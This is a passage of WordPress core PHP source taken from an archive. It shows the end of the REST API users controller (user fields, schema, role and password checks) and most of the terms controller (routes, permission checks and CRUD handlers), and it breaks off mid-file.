$data['first_name'] = $user->first_name;
}
if ( in_array( 'last_name', $fields, true ) ) {
$data['last_name'] = $user->last_name;
}
if ( in_array( 'email', $fields, true ) ) {
$data['email'] = $user->user_email;
}
if ( in_array( 'url', $fields, true ) ) {
$data['url'] = $user->user_url;
}
if ( in_array( 'description', $fields, true ) ) {
$data['description'] = $user->description;
}
if ( in_array( 'link', $fields, true ) ) {
$data['link'] = get_author_posts_url( $user->ID, $user->user_nicename );
}
if ( in_array( 'locale', $fields, true ) ) {
$data['locale'] = get_user_locale( $user );
}
if ( in_array( 'nickname', $fields, true ) ) {
$data['nickname'] = $user->nickname;
}
if ( in_array( 'slug', $fields, true ) ) {
$data['slug'] = $user->user_nicename;
}
if ( in_array( 'roles', $fields, true ) && ( current_user_can( 'list_users' ) || current_user_can( 'edit_user', $user->ID ) ) ) {
// Defensively call array_values() to ensure an array is returned.
$data['roles'] = array_values( $user->roles );
}
if ( in_array( 'registered_date', $fields, true ) ) {
$data['registered_date'] = date( 'c', strtotime( $user->user_registered ) );
}
if ( in_array( 'capabilities', $fields, true ) ) {
$data['capabilities'] = (object) $user->allcaps;
}
if ( in_array( 'extra_capabilities', $fields, true ) ) {
$data['extra_capabilities'] = (object) $user->caps;
}
if ( in_array( 'avatar_urls', $fields, true ) ) {
$data['avatar_urls'] = rest_get_avatar_urls( $user->user_email );
}
if ( in_array( 'meta', $fields, true ) ) {
$data['meta'] = $this->meta->get_value( $user->ID, $request );
}
$context = ! empty( $request['context'] ) ? $request['context'] : 'embed';
$data = $this->add_additional_fields_to_object( $data, $request );
$data = $this->filter_response_by_context( $data, $context );
// Wrap the data in a response object.
$response = rest_ensure_response( $data );
$response->add_links( $this->prepare_links( $user ) );
/**
* Filters user data returned from the REST API.
*
* @since 4.7.0
*
* @param WP_REST_Response $response The response object.
* @param object $user User object used to create response.
* @param WP_REST_Request $request Request object.
*/
return apply_filters( 'rest_prepare_user', $response, $user, $request );
}
/**
* Prepares links for the user request.
*
* @since 4.7.0
*
* @param WP_Post $user User object.
* @return array Links for the given user.
*/
protected function prepare_links( $user ) {
$links = array(
'self' => array(
'href' => rest_url( sprintf( '%s/%s/%d', $this->namespace, $this->rest_base, $user->ID ) ),
),
'collection' => array(
'href' => rest_url( sprintf( '%s/%s', $this->namespace, $this->rest_base ) ),
),
);
return $links;
}
/**
* Prepares a single user for creation or update.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Request object.
* @return object $prepared_user User object.
*/
protected function prepare_item_for_database( $request ) {
$prepared_user = new stdClass;
$schema = $this->get_item_schema();
// required arguments.
if ( isset( $request['email'] ) && ! empty( $schema['properties']['email'] ) ) {
$prepared_user->user_email = $request['email'];
}
if ( isset( $request['username'] ) && ! empty( $schema['properties']['username'] ) ) {
$prepared_user->user_login = $request['username'];
}
if ( isset( $request['password'] ) && ! empty( $schema['properties']['password'] ) ) {
$prepared_user->user_pass = $request['password'];
}
// optional arguments.
if ( isset( $request['id'] ) ) {
$prepared_user->ID = absint( $request['id'] );
}
if ( isset( $request['name'] ) && ! empty( $schema['properties']['name'] ) ) {
$prepared_user->display_name = $request['name'];
}
if ( isset( $request['first_name'] ) && ! empty( $schema['properties']['first_name'] ) ) {
$prepared_user->first_name = $request['first_name'];
}
if ( isset( $request['last_name'] ) && ! empty( $schema['properties']['last_name'] ) ) {
$prepared_user->last_name = $request['last_name'];
}
if ( isset( $request['nickname'] ) && ! empty( $schema['properties']['nickname'] ) ) {
$prepared_user->nickname = $request['nickname'];
}
if ( isset( $request['slug'] ) && ! empty( $schema['properties']['slug'] ) ) {
$prepared_user->user_nicename = $request['slug'];
}
if ( isset( $request['description'] ) && ! empty( $schema['properties']['description'] ) ) {
$prepared_user->description = $request['description'];
}
if ( isset( $request['url'] ) && ! empty( $schema['properties']['url'] ) ) {
$prepared_user->user_url = $request['url'];
}
if ( isset( $request['locale'] ) && ! empty( $schema['properties']['locale'] ) ) {
$prepared_user->locale = $request['locale'];
}
// setting roles will be handled outside of this function.
if ( isset( $request['roles'] ) ) {
$prepared_user->role = false;
}
/**
* Filters user data before insertion via the REST API.
*
* @since 4.7.0
*
* @param object $prepared_user User object.
* @param WP_REST_Request $request Request object.
*/
return apply_filters( 'rest_pre_insert_user', $prepared_user, $request );
}
/**
* Determines if the current user is allowed to make the desired roles change.
*
* @since 4.7.0
*
* @param integer $user_id User ID.
* @param array $roles New user roles.
* @return true|WP_Error True if the current user is allowed to make the role change,
* otherwise a WP_Error object.
*/
protected function check_role_update( $user_id, $roles ) {
global $wp_roles;
foreach ( $roles as $role ) {
if ( ! isset( $wp_roles->role_objects[ $role ] ) ) {
/* translators: %s: role key */
return new WP_Error( 'rest_user_invalid_role', sprintf( __( 'The role %s does not exist.' ), $role ), array( 'status' => 400 ) );
}
$potential_role = $wp_roles->role_objects[ $role ];
/*
* Don't let anyone with 'edit_users' (admins) edit their own role to something without it.
* Multisite super admins can freely edit their blog roles -- they possess all caps.
*/
if ( ! ( is_multisite()
&& current_user_can( 'manage_sites' ) )
&& get_current_user_id() === $user_id
&& ! $potential_role->has_cap( 'edit_users' )
) {
return new WP_Error( 'rest_user_invalid_role', __( 'Sorry, you are not allowed to give users that role.' ), array( 'status' => rest_authorization_required_code() ) );
}
/** Include admin functions to get access to get_editable_roles() */
require_once ABSPATH . 'wp-admin/includes/admin.php';
// The new role must be editable by the logged-in user.
$editable_roles = get_editable_roles();
if ( empty( $editable_roles[ $role ] ) ) {
return new WP_Error( 'rest_user_invalid_role', __( 'Sorry, you are not allowed to give users that role.' ), array( 'status' => 403 ) );
}
}
return true;
}
/**
* Check a username for the REST API.
*
* Performs a couple of checks like edit_user() in wp-admin/includes/user.php.
*
* @since 4.7.0
*
* @param mixed $value The username submitted in the request.
* @param WP_REST_Request $request Full details about the request.
* @param string $param The parameter name.
* @return WP_Error|string The sanitized username, if valid, otherwise an error.
*/
public function check_username( $value, $request, $param ) {
$username = (string) $value;
if ( ! validate_username( $username ) ) {
return new WP_Error( 'rest_user_invalid_username', __( 'Username contains invalid characters.' ), array( 'status' => 400 ) );
}
/** This filter is documented in wp-includes/user.php */
$illegal_logins = (array) apply_filters( 'illegal_user_logins', array() );
if ( in_array( strtolower( $username ), array_map( 'strtolower', $illegal_logins ) ) ) {
return new WP_Error( 'rest_user_invalid_username', __( 'Sorry, that username is not allowed.' ), array( 'status' => 400 ) );
}
return $username;
}
/**
* Check a user password for the REST API.
*
* Performs a couple of checks like edit_user() in wp-admin/includes/user.php.
*
* @since 4.7.0
*
* @param mixed $value The password submitted in the request.
* @param WP_REST_Request $request Full details about the request.
* @param string $param The parameter name.
* @return WP_Error|string The sanitized password, if valid, otherwise an error.
*/
public function check_user_password( $value, $request, $param ) {
$password = (string) $value;
if ( empty( $password ) ) {
return new WP_Error( 'rest_user_invalid_password', __( 'Passwords cannot be empty.' ), array( 'status' => 400 ) );
}
if ( false !== strpos( $password, "\\" ) ) {
return new WP_Error( 'rest_user_invalid_password', __( 'Passwords cannot contain the "\\" character.' ), array( 'status' => 400 ) );
}
return $password;
}
/**
* Retrieves the user's schema, conforming to JSON Schema.
*
* @since 4.7.0
*
* @return array Item schema data.
*/
public function get_item_schema() {
$schema = array(
'$schema' => 'http://json-schema.org/draft-04/schema#',
'title' => 'user',
'type' => 'object',
'properties' => array(
'id' => array(
'description' => __( 'Unique identifier for the user.' ),
'type' => 'integer',
'context' => array( 'embed', 'view', 'edit' ),
'readonly' => true,
),
'username' => array(
'description' => __( 'Login name for the user.' ),
'type' => 'string',
'context' => array( 'edit' ),
'required' => true,
'arg_options' => array(
'sanitize_callback' => array( $this, 'check_username' ),
),
),
'name' => array(
'description' => __( 'Display name for the user.' ),
'type' => 'string',
'context' => array( 'embed', 'view', 'edit' ),
'arg_options' => array(
'sanitize_callback' => 'sanitize_text_field',
),
),
'first_name' => array(
'description' => __( 'First name for the user.' ),
'type' => 'string',
'context' => array( 'edit' ),
'arg_options' => array(
'sanitize_callback' => 'sanitize_text_field',
),
),
'last_name' => array(
'description' => __( 'Last name for the user.' ),
'type' => 'string',
'context' => array( 'edit' ),
'arg_options' => array(
'sanitize_callback' => 'sanitize_text_field',
),
),
'email' => array(
'description' => __( 'The email address for the user.' ),
'type' => 'string',
'format' => 'email',
'context' => array( 'edit' ),
'required' => true,
),
'url' => array(
'description' => __( 'URL of the user.' ),
'type' => 'string',
'format' => 'uri',
'context' => array( 'embed', 'view', 'edit' ),
),
'description' => array(
'description' => __( 'Description of the user.' ),
'type' => 'string',
'context' => array( 'embed', 'view', 'edit' ),
),
'link' => array(
'description' => __( 'Author URL of the user.' ),
'type' => 'string',
'format' => 'uri',
'context' => array( 'embed', 'view', 'edit' ),
'readonly' => true,
),
'locale' => array(
'description' => __( 'Locale for the user.' ),
'type' => 'string',
'enum' => array_merge( array( '', 'en_US' ), get_available_languages() ),
'context' => array( 'edit' ),
),
'nickname' => array(
'description' => __( 'The nickname for the user.' ),
'type' => 'string',
'context' => array( 'edit' ),
'arg_options' => array(
'sanitize_callback' => 'sanitize_text_field',
),
),
'slug' => array(
'description' => __( 'An alphanumeric identifier for the user.' ),
'type' => 'string',
'context' => array( 'embed', 'view', 'edit' ),
'arg_options' => array(
'sanitize_callback' => array( $this, 'sanitize_slug' ),
),
),
'registered_date' => array(
'description' => __( 'Registration date for the user.' ),
'type' => 'string',
'format' => 'date-time',
'context' => array( 'edit' ),
'readonly' => true,
),
'roles' => array(
'description' => __( 'Roles assigned to the user.' ),
'type' => 'array',
'items' => array(
'type' => 'string',
),
'context' => array( 'edit' ),
),
'password' => array(
'description' => __( 'Password for the user (never included).' ),
'type' => 'string',
'context' => array(), // Password is never displayed.
'required' => true,
'arg_options' => array(
'sanitize_callback' => array( $this, 'check_user_password' ),
),
),
'capabilities' => array(
'description' => __( 'All capabilities assigned to the user.' ),
'type' => 'object',
'context' => array( 'edit' ),
'readonly' => true,
),
'extra_capabilities' => array(
'description' => __( 'Any extra capabilities assigned to the user.' ),
'type' => 'object',
'context' => array( 'edit' ),
'readonly' => true,
),
),
);
if ( get_option( 'show_avatars' ) ) {
$avatar_properties = array();
$avatar_sizes = rest_get_avatar_sizes();
foreach ( $avatar_sizes as $size ) {
$avatar_properties[ $size ] = array(
/* translators: %d: avatar image size in pixels */
'description' => sprintf( __( 'Avatar URL with image size of %d pixels.' ), $size ),
'type' => 'string',
'format' => 'uri',
'context' => array( 'embed', 'view', 'edit' ),
);
}
$schema['properties']['avatar_urls'] = array(
'description' => __( 'Avatar URLs for the user.' ),
'type' => 'object',
'context' => array( 'embed', 'view', 'edit' ),
'readonly' => true,
'properties' => $avatar_properties,
);
}
$schema['properties']['meta'] = $this->meta->get_field_schema();
return $this->add_additional_fields_schema( $schema );
}
/**
* Retrieves the query params for collections.
*
* @since 4.7.0
*
* @return array Collection parameters.
*/
public function get_collection_params() {
$query_params = parent::get_collection_params();
$query_params['context']['default'] = 'view';
$query_params['exclude'] = array(
'description' => __( 'Ensure result set excludes specific IDs.' ),
'type' => 'array',
'items' => array(
'type' => 'integer',
),
'default' => array(),
);
$query_params['include'] = array(
'description' => __( 'Limit result set to specific IDs.' ),
'type' => 'array',
'items' => array(
'type' => 'integer',
),
'default' => array(),
);
$query_params['offset'] = array(
'description' => __( 'Offset the result set by a specific number of items.' ),
'type' => 'integer',
);
$query_params['order'] = array(
'default' => 'asc',
'description' => __( 'Order sort attribute ascending or descending.' ),
'enum' => array( 'asc', 'desc' ),
'type' => 'string',
);
$query_params['orderby'] = array(
'default' => 'name',
'description' => __( 'Sort collection by object attribute.' ),
'enum' => array(
'id',
'include',
'name',
'registered_date',
'slug',
'include_slugs',
'email',
'url',
),
'type' => 'string',
);
$query_params['slug'] = array(
'description' => __( 'Limit result set to users with one or more specific slugs.' ),
'type' => 'array',
'items' => array(
'type' => 'string',
),
);
$query_params['roles'] = array(
'description' => __( 'Limit result set to users matching at least one specific role provided. Accepts csv list or single role.' ),
'type' => 'array',
'items' => array(
'type' => 'string',
),
);
$query_params['who'] = array(
'description' => __( 'Limit result set to users who are considered authors.' ),
'type' => 'string',
'enum' => array(
'authors',
),
);
/**
* Filter collection parameters for the users controller.
*
* This filter registers the collection parameter, but does not map the
* collection parameter to an internal WP_User_Query parameter. Use the
* `rest_user_query` filter to set WP_User_Query arguments.
*
* @since 4.7.0
*
* @param array $query_params JSON Schema-formatted collection parameters.
*/
return apply_filters( 'rest_user_collection_params', $query_params );
}
}
��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������endpoints/class-wp-rest-terms-controller.php��������������������������������������������������������0000666�����������������00000100070�15111427772�0015306 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<?php
/**
* REST API: WP_REST_Terms_Controller class
*
* @package WordPress
* @subpackage REST_API
* @since 4.7.0
*/
/**
* Core class used to managed terms associated with a taxonomy via the REST API.
*
* @since 4.7.0
*
* @see WP_REST_Controller
*/
class WP_REST_Terms_Controller extends WP_REST_Controller {
/**
* Taxonomy key.
*
* @since 4.7.0
* @var string
*/
protected $taxonomy;
/**
* Instance of a term meta fields object.
*
* @since 4.7.0
* @var WP_REST_Term_Meta_Fields
*/
protected $meta;
/**
* Column to have the terms be sorted by.
*
* @since 4.7.0
* @var string
*/
protected $sort_column;
/**
* Number of terms that were found.
*
* @since 4.7.0
* @var int
*/
protected $total_terms;
/**
* Constructor.
*
* @since 4.7.0
*
* @param string $taxonomy Taxonomy key.
*/
public function __construct( $taxonomy ) {
$this->taxonomy = $taxonomy;
$this->namespace = 'wp/v2';
$tax_obj = get_taxonomy( $taxonomy );
$this->rest_base = ! empty( $tax_obj->rest_base ) ? $tax_obj->rest_base : $tax_obj->name;
$this->meta = new WP_REST_Term_Meta_Fields( $taxonomy );
}
/**
* Registers the routes for the objects of the controller.
*
* @since 4.7.0
*
* @see register_rest_route()
*/
public function register_routes() {
register_rest_route( $this->namespace, '/' . $this->rest_base, array(
array(
'methods' => WP_REST_Server::READABLE,
'callback' => array( $this, 'get_items' ),
'permission_callback' => array( $this, 'get_items_permissions_check' ),
'args' => $this->get_collection_params(),
),
array(
'methods' => WP_REST_Server::CREATABLE,
'callback' => array( $this, 'create_item' ),
'permission_callback' => array( $this, 'create_item_permissions_check' ),
'args' => $this->get_endpoint_args_for_item_schema( WP_REST_Server::CREATABLE ),
),
'schema' => array( $this, 'get_public_item_schema' ),
) );
register_rest_route( $this->namespace, '/' . $this->rest_base . '/(?P<id>[\d]+)', array(
'args' => array(
'id' => array(
'description' => __( 'Unique identifier for the term.' ),
'type' => 'integer',
),
),
array(
'methods' => WP_REST_Server::READABLE,
'callback' => array( $this, 'get_item' ),
'permission_callback' => array( $this, 'get_item_permissions_check' ),
'args' => array(
'context' => $this->get_context_param( array( 'default' => 'view' ) ),
),
),
array(
'methods' => WP_REST_Server::EDITABLE,
'callback' => array( $this, 'update_item' ),
'permission_callback' => array( $this, 'update_item_permissions_check' ),
'args' => $this->get_endpoint_args_for_item_schema( WP_REST_Server::EDITABLE ),
),
array(
'methods' => WP_REST_Server::DELETABLE,
'callback' => array( $this, 'delete_item' ),
'permission_callback' => array( $this, 'delete_item_permissions_check' ),
'args' => array(
'force' => array(
'type' => 'boolean',
'default' => false,
'description' => __( 'Required to be true, as terms do not support trashing.' ),
),
),
),
'schema' => array( $this, 'get_public_item_schema' ),
) );
}
/**
* Checks if the terms for a post can be read.
*
* @since 6.0.3
*
* @param WP_Post $post Post object.
* @param WP_REST_Request $request Full details about the request.
* @return bool Whether the terms for the post can be read.
*/
public function check_read_terms_permission_for_post( $post, $request ) {
// If the requested post isn't associated with this taxonomy, deny access.
if ( ! is_object_in_taxonomy( $post->post_type, $this->taxonomy ) ) {
return false;
}
// Grant access if the post is publicly viewable.
if ( is_post_publicly_viewable( $post ) ) {
return true;
}
// Otherwise grant access if the post is readable by the logged in user.
if ( current_user_can( 'read_post', $post->ID ) ) {
return true;
}
// Otherwise, deny access.
return false;
}
/**
* Checks if a request has access to read terms in the specified taxonomy.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
* @return bool|WP_Error True if the request has read access, otherwise false or WP_Error object.
*/
public function get_items_permissions_check( $request ) {
$tax_obj = get_taxonomy( $this->taxonomy );
if ( ! $tax_obj || ! $this->check_is_taxonomy_allowed( $this->taxonomy ) ) {
return false;
}
if ( 'edit' === $request['context'] && ! current_user_can( $tax_obj->cap->edit_terms ) ) {
return new WP_Error(
'rest_forbidden_context',
__( 'Sorry, you are not allowed to edit terms in this taxonomy.' ),
array( 'status' => rest_authorization_required_code() )
);
}
if ( ! empty( $request['post'] ) ) {
$post = get_post( $request['post'] );
if ( ! $post ) {
return new WP_Error(
'rest_post_invalid_id',
__( 'Invalid post ID.' ),
array(
'status' => 400,
)
);
}
if ( ! $this->check_read_terms_permission_for_post( $post, $request ) ) {
return new WP_Error(
'rest_forbidden_context',
__( 'Sorry, you are not allowed to view terms for this post.' ),
array(
'status' => rest_authorization_required_code(),
)
);
}
}
return true;
}
/**
* Retrieves terms associated with a taxonomy.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
* @return WP_REST_Response|WP_Error Response object on success, or WP_Error object on failure.
*/
public function get_items( $request ) {
// Retrieve the list of registered collection query parameters.
$registered = $this->get_collection_params();
/*
* This array defines mappings between public API query parameters whose
* values are accepted as-passed, and their internal WP_Query parameter
* name equivalents (some are the same). Only values which are also
* present in $registered will be set.
*/
$parameter_mappings = array(
'exclude' => 'exclude',
'include' => 'include',
'order' => 'order',
'orderby' => 'orderby',
'post' => 'post',
'hide_empty' => 'hide_empty',
'per_page' => 'number',
'search' => 'search',
'slug' => 'slug',
);
$prepared_args = array();
/*
* For each known parameter which is both registered and present in the request,
* set the parameter's value on the query $prepared_args.
*/
foreach ( $parameter_mappings as $api_param => $wp_param ) {
if ( isset( $registered[ $api_param ], $request[ $api_param ] ) ) {
$prepared_args[ $wp_param ] = $request[ $api_param ];
}
}
if ( isset( $prepared_args['orderby'] ) && isset( $request['orderby'] ) ) {
$orderby_mappings = array(
'include_slugs' => 'slug__in',
);
if ( isset( $orderby_mappings[ $request['orderby'] ] ) ) {
$prepared_args['orderby'] = $orderby_mappings[ $request['orderby'] ];
}
}
if ( isset( $registered['offset'] ) && ! empty( $request['offset'] ) ) {
$prepared_args['offset'] = $request['offset'];
} else {
$prepared_args['offset'] = ( $request['page'] - 1 ) * $prepared_args['number'];
}
$taxonomy_obj = get_taxonomy( $this->taxonomy );
if ( $taxonomy_obj->hierarchical && isset( $registered['parent'], $request['parent'] ) ) {
if ( 0 === $request['parent'] ) {
// Only query top-level terms.
$prepared_args['parent'] = 0;
} else {
if ( $request['parent'] ) {
$prepared_args['parent'] = $request['parent'];
}
}
}
/**
* Filters the query arguments before passing them to get_terms().
*
* The dynamic portion of the hook name, `$this->taxonomy`, refers to the taxonomy slug.
*
* Enables adding extra arguments or setting defaults for a terms
* collection request.
*
* @since 4.7.0
*
* @link https://developer.wordpress.org/reference/functions/get_terms/
*
* @param array $prepared_args Array of arguments to be
* passed to get_terms().
* @param WP_REST_Request $request The current request.
*/
$prepared_args = apply_filters( "rest_{$this->taxonomy}_query", $prepared_args, $request );
if ( ! empty( $prepared_args['post'] ) ) {
$query_result = wp_get_object_terms( $prepared_args['post'], $this->taxonomy, $prepared_args );
// Used when calling wp_count_terms() below.
$prepared_args['object_ids'] = $prepared_args['post'];
} else {
$query_result = get_terms( $this->taxonomy, $prepared_args );
}
$count_args = $prepared_args;
unset( $count_args['number'], $count_args['offset'] );
$total_terms = wp_count_terms( $this->taxonomy, $count_args );
// wp_count_terms can return a falsy value when the term has no children.
if ( ! $total_terms ) {
$total_terms = 0;
}
$response = array();
foreach ( $query_result as $term ) {
if ( 'edit' === $request['context'] && ! current_user_can( 'edit_term', $term->term_id ) ) {
continue;
}
$data = $this->prepare_item_for_response( $term, $request );
$response[] = $this->prepare_response_for_collection( $data );
}
$response = rest_ensure_response( $response );
// Store pagination values for headers.
$per_page = (int) $prepared_args['number'];
$page = ceil( ( ( (int) $prepared_args['offset'] ) / $per_page ) + 1 );
$response->header( 'X-WP-Total', (int) $total_terms );
$max_pages = ceil( $total_terms / $per_page );
$response->header( 'X-WP-TotalPages', (int) $max_pages );
$base = add_query_arg( $request->get_query_params(), rest_url( $this->namespace . '/' . $this->rest_base ) );
if ( $page > 1 ) {
$prev_page = $page - 1;
if ( $prev_page > $max_pages ) {
$prev_page = $max_pages;
}
$prev_link = add_query_arg( 'page', $prev_page, $base );
$response->link_header( 'prev', $prev_link );
}
if ( $max_pages > $page ) {
$next_page = $page + 1;
$next_link = add_query_arg( 'page', $next_page, $base );
$response->link_header( 'next', $next_link );
}
return $response;
}
/**
* Get the term, if the ID is valid.
*
* @since 4.7.2
*
* @param int $id Supplied ID.
* @return WP_Term|WP_Error Term object if ID is valid, WP_Error otherwise.
*/
protected function get_term( $id ) {
$error = new WP_Error( 'rest_term_invalid', __( 'Term does not exist.' ), array( 'status' => 404 ) );
if ( ! $this->check_is_taxonomy_allowed( $this->taxonomy ) ) {
return $error;
}
if ( (int) $id <= 0 ) {
return $error;
}
$term = get_term( (int) $id, $this->taxonomy );
if ( empty( $term ) || $term->taxonomy !== $this->taxonomy ) {
return $error;
}
return $term;
}
/**
* Checks if a request has access to read or edit the specified term.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
* @return bool|WP_Error True if the request has read access for the item, otherwise false or WP_Error object.
*/
public function get_item_permissions_check( $request ) {
$term = $this->get_term( $request['id'] );
if ( is_wp_error( $term ) ) {
return $term;
}
if ( 'edit' === $request['context'] && ! current_user_can( 'edit_term', $term->term_id ) ) {
return new WP_Error( 'rest_forbidden_context', __( 'Sorry, you are not allowed to edit this term.' ), array( 'status' => rest_authorization_required_code() ) );
}
return true;
}
/**
* Gets a single term from a taxonomy.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
* @return WP_REST_Response|WP_Error Response object on success, or WP_Error object on failure.
*/
public function get_item( $request ) {
$term = $this->get_term( $request['id'] );
if ( is_wp_error( $term ) ) {
return $term;
}
$response = $this->prepare_item_for_response( $term, $request );
return rest_ensure_response( $response );
}
/**
* Checks if a request has access to create a term.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
* @return bool|WP_Error True if the request has access to create items, false or WP_Error object otherwise.
*/
public function create_item_permissions_check( $request ) {
if ( ! $this->check_is_taxonomy_allowed( $this->taxonomy ) ) {
return false;
}
$taxonomy_obj = get_taxonomy( $this->taxonomy );
if ( ( is_taxonomy_hierarchical( $this->taxonomy )
&& ! current_user_can( $taxonomy_obj->cap->edit_terms ) )
|| ( ! is_taxonomy_hierarchical( $this->taxonomy )
&& ! current_user_can( $taxonomy_obj->cap->assign_terms ) ) ) {
return new WP_Error( 'rest_cannot_create', __( 'Sorry, you are not allowed to create new terms.' ), array( 'status' => rest_authorization_required_code() ) );
}
return true;
}
/**
* Creates a single term in a taxonomy.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
* @return WP_REST_Response|WP_Error Response object on success, or WP_Error object on failure.
*/
public function create_item( $request ) {
if ( isset( $request['parent'] ) ) {
if ( ! is_taxonomy_hierarchical( $this->taxonomy ) ) {
return new WP_Error( 'rest_taxonomy_not_hierarchical', __( 'Cannot set parent term, taxonomy is not hierarchical.' ), array( 'status' => 400 ) );
}
$parent = get_term( (int) $request['parent'], $this->taxonomy );
if ( ! $parent ) {
return new WP_Error( 'rest_term_invalid', __( 'Parent term does not exist.' ), array( 'status' => 400 ) );
}
}
$prepared_term = $this->prepare_item_for_database( $request );
$term = wp_insert_term( wp_slash( $prepared_term->name ), $this->taxonomy, wp_slash( (array) $prepared_term ) );
if ( is_wp_error( $term ) ) {
/*
* If we're going to inform the client that the term already exists,
* give them the identifier for future use.
*/
if ( $term_id = $term->get_error_data( 'term_exists' ) ) {
$existing_term = get_term( $term_id, $this->taxonomy );
$term->add_data( $existing_term->term_id, 'term_exists' );
$term->add_data( array( 'status' => 400, 'term_id' => $term_id ) );
}
return $term;
}
$term = get_term( $term['term_id'], $this->taxonomy );
/**
* Fires after a single term is created or updated via the REST API.
*
* The dynamic portion of the hook name, `$this->taxonomy`, refers to the taxonomy slug.
*
* @since 4.7.0
*
* @param WP_Term $term Inserted or updated term object.
* @param WP_REST_Request $request Request object.
* @param bool $creating True when creating a term, false when updating.
*/
do_action( "rest_insert_{$this->taxonomy}", $term, $request, true );
$schema = $this->get_item_schema();
if ( ! empty( $schema['properties']['meta'] ) && isset( $request['meta'] ) ) {
$meta_update = $this->meta->update_value( $request['meta'], $term->term_id );
if ( is_wp_error( $meta_update ) ) {
return $meta_update;
}
}
$fields_update = $this->update_additional_fields_for_object( $term, $request );
if ( is_wp_error( $fields_update ) ) {
return $fields_update;
}
$request->set_param( 'context', 'view' );
/**
* Fires after a single term is completely created or updated via the REST API.
*
* The dynamic portion of the hook name, `$this->taxonomy`, refers to the taxonomy slug.
*
* @since 5.0.0
*
* @param WP_Term $term Inserted or updated term object.
* @param WP_REST_Request $request Request object.
* @param bool $creating True when creating a term, false when updating.
*/
do_action( "rest_after_insert_{$this->taxonomy}", $term, $request, true );
$response = $this->prepare_item_for_response( $term, $request );
$response = rest_ensure_response( $response );
$response->set_status( 201 );
$response->header( 'Location', rest_url( $this->namespace . '/' . $this->rest_base . '/' . $term->term_id ) );
return $response;
}
/**
* Checks if a request has access to update the specified term.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
* @return bool|WP_Error True if the request has access to update the item, false or WP_Error object otherwise.
*/
public function update_item_permissions_check( $request ) {
$term = $this->get_term( $request['id'] );
if ( is_wp_error( $term ) ) {
return $term;
}
if ( ! current_user_can( 'edit_term', $term->term_id ) ) {
return new WP_Error( 'rest_cannot_update', __( 'Sorry, you are not allowed to edit this term.' ), array( 'status' => rest_authorization_required_code() ) );
}
return true;
}
/**
* Updates a single term from a taxonomy.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
* @return WP_REST_Response|WP_Error Response object on success, or WP_Error object on failure.
*/
public function update_item( $request ) {
$term = $this->get_term( $request['id'] );
if ( is_wp_error( $term ) ) {
return $term;
}
if ( isset( $request['parent'] ) ) {
if ( ! is_taxonomy_hierarchical( $this->taxonomy ) ) {
return new WP_Error( 'rest_taxonomy_not_hierarchical', __( 'Cannot set parent term, taxonomy is not hierarchical.' ), array( 'status' => 400 ) );
}
$parent = get_term( (int) $request['parent'], $this->taxonomy );
if ( ! $parent ) {
return new WP_Error( 'rest_term_invalid', __( 'Parent term does not exist.' ), array( 'status' => 400 ) );
}
}
$prepared_term = $this->prepare_item_for_database( $request );
// Only update the term if we haz something to update.
if ( ! empty( $prepared_term ) ) {
$update = wp_update_term( $term->term_id, $term->taxonomy, wp_slash( (array) $prepared_term ) );
if ( is_wp_error( $update ) ) {
return $update;
}
}
$term = get_term( $term->term_id, $this->taxonomy );
/** This action is documented in wp-includes/rest-api/endpoints/class-wp-rest-terms-controller.php */
do_action( "rest_insert_{$this->taxonomy}", $term, $request, false );
$schema = $this->get_item_schema();
if ( ! empty( $schema['properties']['meta'] ) && isset( $request['meta'] ) ) {
$meta_update = $this->meta->update_value( $request['meta'], $term->term_id );
if ( is_wp_error( $meta_update ) ) {
return $meta_update;
}
}
$fields_update = $this->update_additional_fields_for_object( $term, $request );
if ( is_wp_error( $fields_update ) ) {
return $fields_update;
}
$request->set_param( 'context', 'view' );
/** This action is documented in wp-includes/rest-api/endpoints/class-wp-rest-terms-controller.php */
do_action( "rest_after_insert_{$this->taxonomy}", $term, $request, false );
$response = $this->prepare_item_for_response( $term, $request );
return rest_ensure_response( $response );
}
/**
* Checks if a request has access to delete the specified term.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
* @return bool|WP_Error True if the request has access to delete the item, otherwise false or WP_Error object.
*/
public function delete_item_permissions_check( $request ) {
$term = $this->get_term( $request['id'] );
if ( is_wp_error( $term ) ) {
return $term;
}
if ( ! current_user_can( 'delete_term', $term->term_id ) ) {
return new WP_Error( 'rest_cannot_delete', __( 'Sorry, you are not allowed to delete this term.' ), array( 'status' => rest_authorization_required_code() ) );
}
return true;
}
/**
* Deletes a single term from a taxonomy.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
* @return WP_REST_Response|WP_Error Response object on success, or WP_Error object on failure.
*/
public function delete_item( $request ) {
$term = $this->get_term( $request['id'] );
if ( is_wp_error( $term ) ) {
return $term;
}
$force = isset( $request['force'] ) ? (bool) $request['force'] : false;
// We don't support trashing for terms.
if ( ! $force ) {
/* translators: %s: force=true */
return new WP_Error( 'rest_trash_not_supported', sprintf( __( "Terms do not support trashing. Set '%s' to delete." ), 'force=true' ), array( 'status' => 501 ) );
}
$request->set_param( 'context', 'view' );
$previous = $this->prepare_item_for_response( $term, $request );
$retval = wp_delete_term( $term->term_id, $term->taxonomy );
if ( ! $retval ) {
return new WP_Error( 'rest_cannot_delete', __( 'The term cannot be deleted.' ), array( 'status' => 500 ) );
}
$response = new WP_REST_Response();
$response->set_data( array( 'deleted' => true, 'previous' => $previous->get_data() ) );
/**
* Fires after a single term is deleted via the REST API.
*
* The dynamic portion of the hook name, `$this->taxonomy`, refers to the taxonomy slug.
*
* @since 4.7.0
*
* @param WP_Term $term The deleted term.
* @param WP_REST_Response $response The response data.
* @param WP_REST_Request $request The request sent to the API.
*/
do_action( "rest_delete_{$this->taxonomy}", $term, $response, $request );
return $response;
}
/**
* Prepares a single term for create or update.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Request object.
* @return object $prepared_term Term object.
*/
